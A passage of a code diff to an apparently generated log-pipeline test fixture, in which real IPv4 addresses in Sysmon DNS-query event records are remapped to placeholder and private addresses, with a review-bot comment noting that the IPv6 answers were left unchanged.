- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "network": {
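Review bot: The IPv6 answers `2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30` and `2001:500:856e::30` remain real public addresses on the new side of this hunk's `resolved_ip` list (and in the `ip` lists of hunks -2984, -3218, -3249, -3374 and -3613), while every IPv4 answer next to them was remapped to 89.160.20.156 or a 192.168.0.0/16 address. If the intent is that the fixture carries only the supported test subset, the IPv6 records presumably need the same treatment, for example the RFC 3849 documentation prefix 2001:db8::/32, or the PR description should state that IPv6 answers are deliberately left as-is so the question does not recur on the next regeneration. This file appears to be generated pipeline test output, so the remap belongs in the sample log it is produced from rather than in this expected file.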
@@ -2984,22 +2950,22 @@
 "px.ads.linkedin.com"
 ],
 "ip": [
- "108.174.10.14",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "event": {
- "ingested": "2021-10-14T04:10:32.313775256Z",
+ "ingested": "2021-12-09T13:49:44.739216300Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:03.029Z",
@@ -3067,22 +3033,22 @@
 "type": "CNAME"
 },
 {
- "data": "40.90.23.239",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "40.90.23.213",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "40.90.23.154",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "40.90.23.239",
- "40.90.23.213",
- "40.90.23.154"
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -3099,15 +3065,13 @@
 "login.live.com"
 ],
 "ip": [
- "40.90.23.239",
- "40.90.23.213",
- "40.90.23.154"
+ "89.160.20.156"
 ]
 },
 "event": {
- "ingested": "2021-10-14T04:10:32.313776561Z",
+ "ingested": "2021-12-09T13:49:44.739221100Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:03.029Z",
@@ -3174,11 +3138,11 @@
 },
 "answers": [
 {
- "data": "74.119.119.150",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -3186,7 +3150,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -3194,7 +3158,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -3202,7 +3166,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -3210,7 +3174,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 },
 {
@@ -3218,23 +3182,23 @@
 "type": "AAAA"
 },
 {
- "data": "192.35.51.30",
+ "data": "192.168.51.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "74.119.119.150",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30",
+ "192.168.94.30",
 "2001:502:1ca1::30",
- "192.35.51.30"
+ "192.168.51.30"
 ]
 },
 "network": {
@@ -3249,24 +3213,24 @@
 "dis.criteo.com"
 ],
 "ip": [
- "74.119.119.150",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30",
+ "192.168.94.30",
 "2001:502:1ca1::30",
- "192.35.51.30"
+ "192.168.51.30"
 ]
 },
 "event": {
- "ingested": "2021-10-14T04:10:32.313778040Z",
+ "ingested": "2021-12-09T13:49:44.739226200Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:03.029Z",
@@ -3334,39 +3298,39 @@
 "type": "CNAME"
 },
 {
- "data": "68.67.180.12",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.179.228",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.180.44",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "204.13.192.141",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.178.230",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.178.252",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.179.23",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "68.67.179.232",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -3374,22 +3338,22 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "68.67.180.12",
- "68.67.179.228",
- "68.67.180.44",
- "204.13.192.141",
- "68.67.178.230",
- "68.67.178.252",
- "68.67.179.23",
- "68.67.179.232",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30"
+ "192.168.14.30"
 ]
 },
 "network": {
@@ -3406,23 +3370,16 @@
 "ib.adnxs.com"
 ],
 "ip": [
- "68.67.180.12",
- "68.67.179.228",
- "68.67.180.44",
- "204.13.192.141",
- "68.67.178.230",
- "68.67.178.252",
- "68.67.179.23",
- "68.67.179.232",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30"
+ "192.168.14.30"
 ]
 },
 "event": {
- "ingested": "2021-10-14T04:10:32.313779569Z",
+ "ingested": "2021-12-09T13:49:44.739231800Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:03.029Z",
@@ -3486,12 +3443,12 @@
 "type": "CNAME"
 },
 {
- "data": "172.217.10.34",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "172.217.10.34"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -3507,13 +3464,13 @@
 "cm.g.doubleclick.net"
 ],
 "ip": [
- "172.217.10.34"
+ "89.160.20.156"
 ]
 },
 "event": {
- "ingested": "2021-10-14T04:10:32.313780706Z",
+ "ingested": "2021-12-09T13:49:44.739237400Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:03.029Z",
@@ -3577,35 +3534,35 @@
 "type": "CNAME"
 },
 {
- "data": "54.208.129.24",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "54.175.5.93",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.86.210.96",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "3.93.252.59",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "54.86.97.130",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.194.239.194",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "3.94.67.102",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -3613,21 +3570,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "54.208.129.24",
- "54.175.5.93",
- "52.86.210.96",
- "3.93.252.59",
- "54.86.97.130",
- "34.194.239.194",
- "3.94.67.102",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30"
+ "192.168.14.30"
 ]
 },
 "network": {
@@ -3643,22 +3600,16 @@
 "match.adsrvr.org"
 ],
 "ip": [
- "54.208.129.24",
- "54.175.5.93",
- "52.86.210.96",
- "3.93.252.59",
- "54.86.97.130",
- "34.194.239.194",
- "3.94.67.102",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30"
+ "192.168.14.30"
 ]
 },
 "event": {
- "ingested": "2021-10-14T04:10:32.313781939Z",
+ "ingested": "2021-12-09T13:49:44.739243300Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 